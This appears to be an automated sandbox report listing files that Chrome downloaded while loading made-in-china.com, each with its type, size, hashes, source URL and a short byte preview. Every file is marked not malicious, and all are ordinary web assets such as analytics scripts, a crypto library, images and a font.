                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (64470), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):159311
                                                                                                          Entropy (8bit):5.497797508101857
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:2342F9983EE261CCB386C5A30C5FA3DA
                                                                                                          SHA1:51978E195BD9B74C57CB48E392E4974001873CA8
                                                                                                          SHA-256:587D77FB94F138EB07311CB1CF2CA8C530FC88D6AB82104DC3C72F939B22364C
                                                                                                          SHA-512:306D7766AF2A3BD5CF50069011C0C6B06B1FB8FBE5DCA3F9354B8297FD39EFF0B2501B2FBF2DBA469224F932AF5B3A311FE72CCC22C5A7EE37F2CBD8929A8BFA
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/js/libs/sensors/sfaw_1.22.7.js?r=1727402485614
                                                                                                          Preview:function _typeof(e){"@babel/helpers - typeof";return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_typeof(e)}!function(e,t){"object"==(typeof exports==="undefined"?"undefined":_typeof(exports))&&"object"==(typeof module==="undefined"?"undefined":_typeof(module))?module.exports=t():t()}(this,function(){function u(e){if(!e)return!1;var t=Object.prototype.toString.call(e);return"[object Function]"==t||"[object AsyncFunction]"==t}function _(){return Date.now&&u(Date.now)?Date.now():(new Date).getTime()}function f(e){return null!=e&&"[object Object]"==Object.prototype.toString.call(e)}function l(){if("function"==typeof Uint32Array){var e="";if("undefined"!=typeof crypto?e=crypto:"undefined"!=typeof msCrypto&&(e=msCrypto),f(e)&&e.getRandomValues){var t=new Uint32Array(1),r=e.getRandomValues(t)[0],i=Math.pow(2,32);return r/i}}retu
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 750 x 667, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):283203
                                                                                                          Entropy (8bit):7.987245623937259
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:81920BACD7908D650B5EC3AC57E708E2
                                                                                                          SHA1:BDD0DC846F6DAEA4C0FD080DCEE484B22C77A1B3
                                                                                                          SHA-256:9B5105676229D79674060938D9D5EE917268AF79FE62FCBE247DE1AADEE57ACA
                                                                                                          SHA-512:0B2E5E4B11040767A377312C0039BE8EA0F9F19E7C1DD5DEF3ABFBE5F00F9537683DA9A139D8EBA96C80E76B37DBC5FFC0DD67045AD94E71940F2D22D7139449
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://images.squarespace-cdn.com/content/v1/66fc2125bd1193293900133a/31a2fda2-be6f-4e11-8369-3edd43384afe/8e09-eab2-dc7b-bbdf.png?format=750w
                                                                                                          Preview:.PNG........IHDR.....................pHYs............... .IDATx..}..(...N...o{fW...].7_..*.;..]...Z.....33~.0...i..&..<... ..<+c+E.3...i....@MF....x.N...^.....b.'t.\..H..:..de..gg...$)J..e...p{,.o.6......u\Q.>.32~.g.N.....1..n..=Nw.j..9n_w...{.....nS4`..\RP.,@....m... !....u.....v"#>7...*.F..8.e..O..%.{.....8....~.-Xl..S/..2........8y..8].zqf...Y....TlQp.p...o.6v|...&.>..9nw....n3....[...}v...F.!N#n..Op....#.E%........)N.nOd\...........4I"p...\.(1.M.$\_..(.k.SX.g.{WEF.?.}DF..dX...C.F2Z.F2..>....mH..!N.0N%...4..?..X..K.:.'.?>o.Ej.)N8..U>[...,....OR.u8}.]..p...k........t...r...E.'}......F.i.m.:.d.r.~....<N..m../..p{G.....w.w=....).HOY.U<.C.6....U}.1Z.....G.r..F.I.K.%.^F...1..2.......{...........#.3.<....&Nc=D. .e....r...^..Q.EJi.....N4.'.*..[...EF...=.Z=:.......g.......y..[...Y.'..N.n..Op....n;....-...6^...by.".#.n|...+....}...s.@lr;...W8.E.....^...l...;.0...n.r..v..p{.S[.7.....x.A.2.}.........r(..w....L:......R]...^.y..../.d.+m~.{{s..Za(#.4?F.?.S]?.$..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (12486)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):12585
                                                                                                          Entropy (8bit):5.06032459956013
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:57EBAA1F87101EB84152ADFC5ED9C4F8
                                                                                                          SHA1:70712DE524A7329FF5ED6997DACC5AE751C2DB58
                                                                                                          SHA-256:944AE8DB0C1C0658F5FC75B8FE876F3F3613C98F27312ECE614825D91E8DA22B
                                                                                                          SHA-512:BD94B889213CA46F4C859C720F6A3DB868293C0C5FFCADDEF2CD89E0B2385E9173D5D52E918F1D05981F757AFB8DC54C34B97E8B7E104BBD54AD4350454F5302
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/js/assets/async-scripts/index_71d22c6d.js
                                                                                                          Preview:function _typeof(t){"@babel/helpers - typeof";return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},_typeof(t)}function _regeneratorRuntime(){"use strict";_regeneratorRuntime=function t(){return i};var i={},t=Object.prototype,l=t.hasOwnProperty,s=Object.defineProperty||function(t,e,r){t[e]=r.value},e="function"==typeof Symbol?Symbol:{},o=e.iterator||"@@iterator",r=e.asyncIterator||"@@asyncIterator",n=e.toStringTag||"@@toStringTag";function a(t,e,r){return Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{a({},"")}catch(t){a=function t(e,r,n){return e[r]=n}}function u(t,e,r,n){var o=e&&e.prototype instanceof c?e:c,a=Object.create(o.prototype),i=new S(n||[]);return s(a,"_invoke",{value:_(t,r,i)}),a}function h(t,e,r){try{return{type:"normal",arg:t.call(e,r)}}catch(t){return{type:"throw",arg:
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 200x200, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5396
                                                                                                          Entropy (8bit):7.451194098098607
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:AB41F9092CD71110562495ABD4C7DAD8
                                                                                                          SHA1:80AADB5A3479EB6B641614EF083AC8C66BE0563C
                                                                                                          SHA-256:8FC793D3D091BD05C3139BB2DAD4B757FB91FD91A419B49568F4AFCCAB248CC1
                                                                                                          SHA-512:B60E7C496FEC7508F0CAF344F12099E1C6A241E4C2BD7141C79730F1171B4D979BE87E49C2DDA2AF4B728752923C0823013CC9DC5163CEF2A76042FC5A5BBB0B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:......Exif..II*.................Ducky.......K......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:9a18c406-1297-184e-9439-33d7cd94f0dc" xmpMM:DocumentID="xmp.did:0F8E44517C7A11EFBFD0C1CA77CAC80B" xmpMM:InstanceID="xmp.iid:0F8E44507C7A11EFBFD0C1CA77CAC80B" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8cc51ddd-e20c-ab4d-9d07-e554301e759a" stRef:documentID="adobe:docid:photoshop:078fe6a0-0f7a-ed4d-8b4e-1f06e7421003"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 100x100, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                          Category:dropped
                                                                                                          Size (bytes):966
                                                                                                          Entropy (8bit):7.7559568441947455
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:BF1F1858C9222DC82B45FE818F44BF7A
                                                                                                          SHA1:CD955B4948CA3D4C3C002980A7CABFBA6960F9FE
                                                                                                          SHA-256:D6DCDA116D0B7CF4B52AB0C16C1984DD8CAEC5F88753E14FEBD42895298E8E98
                                                                                                          SHA-512:752608785B98AECA9CA2D0321156BB46866CD8FEE9579B8C6FD5498FB679BE6F29D4F3638A1BA75A57C51E94557124A0B663CD212551658D32B6C4E4171C7188
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:RIFF....WEBPVP8 .........*d.d.>Q".E#.!..lh8....j`oBq0yHAW.?).O..y..M.7.-.....'.....g.k...T7......o5~.k7./.......K..[......4*.....UkP.up.v.^......}.O...6....4.\..?q.R...n. .f...AQLV.%.2......rz.=.G....9#Y.:}...N ...O.t.....(T.`+.P...z.....%..B!..w...Q.(*.E..%....~.~...4..H.n...G.4.T.\.r.B..Y|.P..a../.X...+.........`..."..B2....o.S.g.x.z?(U..Q9t.x9...j... ..q~.....e......7%....%...A.gN.d..<..4....10ACBa\..G.=.H.4...p.g..laN..2.N....w...'+.Th.....f.7..2X...L.$M.|$.&..j...]n...?.Kl(.gK.$....Pv.....9-..2..\WU].T|....c.tq.d......$(..d.h.p...u'=....\..:a.P.7%.....QF.C/...m#5e...n6...xdw:O_.@......[..+.RU...G.tM.%..y~.}...`?=..=(....GE...wU....{.t.].u.AN.^p.q..6B.5r;2r.~...'........w.b.....1....zj...{..K.G:.........?..r*(...E........b........V.G.....`..&U..*V.8.>.Z!....&A...:5..#.....H.).$I:.....u84l[..#.q(!..a....h#..5"`_.9...k!....U.Q..b........r.}.b..a.!.{...`.....l...2.........|`].W.;..&..s.....:B|NiP..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (4787)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4970
                                                                                                          Entropy (8bit):5.381661403779611
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:4F848EF38573CA4C449B172CF86933BE
                                                                                                          SHA1:7E4180B87F2762714C6968753593F7F0850B2B6F
                                                                                                          SHA-256:275BB0FB8399DF2A32C9789BF767F75D932761F2D6EFA36BA08551DCAD669A1A
                                                                                                          SHA-512:7FFE8257535B8239EBA9AC7C933B00D64D03BCEED0ADAC2138AC0F6944A9511899A9A278A051E3FF5A520B049DF2B102149D4049F7AA8DCDFB43F2755CCDA090
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:function _typeof(e){"@babel/helpers - typeof";return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_typeof(e)}(function(e,r){(typeof exports==="undefined"?"undefined":_typeof(exports))==="object"&&typeof module!=="undefined"?module.exports=r():typeof define==="function"&&define.amd?define(r):(e=typeof globalThis!=="undefined"?globalThis:e||self,e.MSR=r())})(this,function(){"use strict";var i=void 0;var p=window;var e={platform:"browser"};try{Object.freeze(e)}catch(e){}var t=[];var n=/^(?:complete|loaded)$/.test(document.readyState);var o=function e(){if(n){var r;while(r=t.shift()){r()}}};var r=function e(r){if(typeof r==="function"){t.push(r)}o()};var a=function e(){if(!n){document.addEventListener("DOMContentLoaded",function(){n=true;o()},false)}else{o()}};var s=Object.prototype.toString;var c=/(\w+)\]$/;var f=function e(r)
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 50x50, components 3
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):4171
                                                                                                          Entropy (8bit):7.8075915300516945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:F9CE462261A4A70F3EF7AE5D8A1B041B
                                                                                                          SHA1:E074695454F5EF2CEDB5A48E128C135C5DC603FD
                                                                                                          SHA-256:96949A0561D5223DC465B762D809375E5AB52D746A653AA76287FB4C152D243D
                                                                                                          SHA-512:DD8FFE69EF650DE4F8B20FB8D36669771371BFDC7081674737C520FC120D4CD7A532B87205F8CAA3A0983D60D80379BA6934B46C7B8881E2DD60C0D95D7BD962
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://pic.made-in-china.com/61f54j00JQEaTePFJthw/Selected-Industry.jpg
                                                                                                          Preview:......JFIF.....H.H.....C....................................................................C.......................................................................2.2...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....S#..'.....e$...-7.....]iZ..G..Q...uiP\E.xKG.5H.]..#.....v.p'..3.Z./.i>..+.{.}..P.[.p.]...M]...w..|5...v?..ZbZ=...!..5..[...0....t.^y.e.]..-./.7-...w<..0..Y.s...Y.}......WJ.n...]o...I-..z%d.vN.M......+G..k....tI.u/.^#..;.......i...>.q.u....{o.Z.p.k}.YM..Cz....Mhn.o.8...xb...A..r....p.|v/....x...b.F.V..Jx..oj.A...E.*..b...9.i&.......*V..........9|G....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (50522), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):50523
                                                                                                          Entropy (8bit):5.297134171375771
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:14272A6CDF99BDC079B8EC8097889F49
                                                                                                          SHA1:2343F9F1D29F3B034F3B8FFB7A92BFFD98A88450
                                                                                                          SHA-256:73AAA4E6BFC1DBED5F3F934710D1ADA545F4068742235E59D0CB74F0EAF0A3C4
                                                                                                          SHA-512:BD83B900ACBFB123F485F46DE1692710B7C77DE90739CA3CFAB7A58CF3B71FCD9D97FCCEC6762528886C57A41F101574209F65B2BEF745613F0BCB7D196200A5
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):48316
                                                                                                          Entropy (8bit):5.6346993394709
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (5552)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):99262
                                                                                                          Entropy (8bit):5.47868180389269
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:FAAC9D9A4994024A1718414DA02CE239
                                                                                                          SHA1:8F5143D859922E194B619273A9A9401E4C265D59
                                                                                                          SHA-256:70728D3E8197B5BDA25CFB11C3671F99B4DD8D187863CA1BE354DE2AD0A62542
                                                                                                          SHA-512:32BE5DDB3A6E1E3086DA31FDFB732E40E0C2DE5E64C169889A40F4D1A7A4ADFDA1E855976AB15A3B767756CFE8E35524B77BF956E606819698DDA2786F1293B0
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 200x200, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9330
                                                                                                          Entropy (8bit):7.917333589713464
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:95843EBAEC5C3807D37EBE099B4B245C
                                                                                                          SHA1:88923FF7C400CC89EBFFABCCDD8F864CC498C92D
                                                                                                          SHA-256:F62BD94DBFF9DAAA78C444CD6C10165CCF30CF307A5CB540E61A2C96A1573FE5
                                                                                                          SHA-512:E44C9E9EE03D62276B225B9FFEE283C5FCC47C81D9E8B3BB17E2294167372F8800A80894C9A5256C37B45208295D33A280014856280E61E86142EB6307B3D332
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="6E6875308AE6AC49541E72F14511FBD6" xmpMM:DocumentID="xmp.did:7CEF65B47C7A11EFBD88B70828851E4F" xmpMM:InstanceID="xmp.iid:7CEF65B37C7A11EFBD88B70828851E4F" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:673fea04-7375-314e-b87e-390658d3d525" stRef:documentID="adobe:docid:photoshop:5b24a702-2be8-b840-9292-ed245010965a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (22835), with CR, LF line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):419229
                                                                                                          Entropy (8bit):5.317330424451648
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:53895D0236151E28F0C0C797216CAA91
                                                                                                          SHA1:7B94CDA4E2270EAE9125C98DACDBE1BC854F433F
                                                                                                          SHA-256:50F5769257C39AC98D193295D62C7F5DA94986F348189EE30DE267AE14CD7A2E
                                                                                                          SHA-512:61C8F967C668C0B674AEB1E1B4DB43B30B5F615E13FE4BAECDC43A32D6F34A6DA650955AEBF1B5365B6FCEA29E67E0F50E5F33FDEBE596CA5AD36A7D040DA8D3
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.made-in-china.com/
                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">.<head>.<meta charset="UTF-8">.<meta http-equiv="X-UA-Compatible" content="ie=edge">.<meta name="viewport" content="initial-scale=1.0,user-scalable=no,maximum-scale=1,width=device-width">.<base href="//www.made-in-china.com" target="_top">.<link rel="dns-prefetch" href="//www.micstatic.com">.<link rel="preconnect" href="//www.micstatic.com">.<link rel="dns-prefetch" href="//image.made-in-china.com">.<link rel="preconnect" href="//image.made-in-china.com">.<link rel="dns-prefetch" href="//pic.made-in-china.com">.<link rel="preconnect" href="//pic.made-in-china.com">.<title>Made-in-China.com - Manufacturers, Suppliers & Products in China</title>.<meta name="keywords" content="China Manufacturers, China Suppliers, Products Made in China">.<meta name="description" content="Source quality products Made in China. Find reliable China Suppliers, Manufacturers, Factories, Wholesalers & Exporters on the leading B2B e-commerce website Made-in-China.com.">.<link rel
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 150 x 80, 8-bit colormap, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6888
                                                                                                          Entropy (8bit):7.914788333664536
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:285A79273B68EFB454E833A0809B561C
                                                                                                          SHA1:AA0D9D622DA4D90C884770B220C10E45BF23341B
                                                                                                          SHA-256:096157CE72B5DC2EE36EA4A9896853EA056BDE6667F0FC893D0AA5CA8CA02699
                                                                                                          SHA-512:560A5E5086B8F8250D6EAF17A4347E707B5AE2BF21E860AFDB61748F4C83C74CD64823229B2FAB87924E93ADE1FE74CF208B0FC725A687A81ABF14CD2C8BE7C2
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.PNG........IHDR.......P......n|y....PLTEGpLOv*hz]^{RNs..........~.u.....a.8...[.4[yR...Qw+[.3.....[.3......[.4............d..`.7Pt,[v.i.H.......!#e..Up................................&#....|w...%(0...%'-..................."%*..........(*2........Q{*........j........dbg.!&......`.................X.....*.7...E|.T..Gp&W..Xcv...c.....s..tnj_\Zao......Z.2...5_.a.=>r.7i.u../3:RYf......X}8...gjum..Cm.ps~Lz....YUS...pe[c........M..z..4AO~..999...........=?B...........L\s....../0.JLPo..........h.LCN^Pt.TQDn......j..^{..ugm..'($w.....HHB..@f#.......Bc.\..0Qtm{.......................q.....Sn.}.fluF|z{...~...~|..z...r.N..v...<O(.....|*Z.....L...XW....sr...}.[...fe_b@.>6.IL.II.U9.63........E.IK........</.....m.GpLL.......tRNS..!L.H...;m....j....0.`.................i......u...............................................................................................................................................................................................
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 230 x 330, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):11458
                                                                                                          Entropy (8bit):7.904297785158171
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:787F48AB4127507AAD1BBD451BB38159
                                                                                                          SHA1:AE850D09D125B9371D641CA2F20DCBF4748C51EA
                                                                                                          SHA-256:6AFDF5A36836BC6D0762459928ACC315B0C0A907A63734F1914677076FFDD8DF
                                                                                                          SHA-512:12A0C8E8E5FF29F1D0909E0E5FA688820C87E1B8AFD10473F97DA774C70216B88752ED2CB63DDBAEE405911A5EB72167ACA3A8D05D22275EDF3E03E30BCECB60
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/mic-search/img/home-2019/alert-brands-new_2fc4052e.png?v=1
                                                                                                          Preview:.PNG........IHDR.......J.......#.....tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:5FEF34503AC211EC89ACAEE3776F46B7" xmpMM:InstanceID="xmp.iid:5FEF344F3AC211EC89ACAEE3776F46B7" xmp:CreatorTool="Adobe Photoshop 21.2 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7FD70E073AB311EC89ACAEE3776F46B7" stRef:documentID="xmp.did:7FD70E083AB311EC89ACAEE3776F46B7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...E..)3IDATx....U......*M... b7b... ".X.+.....EJ....P.......b7F.B.XQ..F.#.RDz..^.u3..}m..7..}...[...Yw.....:
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 19496, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):19496
                                                                                                          Entropy (8bit):7.988783123054901
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:2615547D207B037B3F6B559A928AFC40
                                                                                                          SHA1:218A0EC76D21728F13E51BCF22D744DB04B3169D
                                                                                                          SHA-256:43DC1BD28D4C18A569A0005609C914ED7DBE8B51258B9C4576F610BAE4A04205
                                                                                                          SHA-512:F4D807378EFD5299EDA4200FBBA250E317AE88CC7C90357B5756FB5E4A171229A89499F81A49D9E4B986807A52C631041C56A3BAAD4A5AC8E15DA1CB950BC50F
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/common/fontastic/dist/assets/roboto/500-medium/Roboto-Medium_2b1702b4.woff2
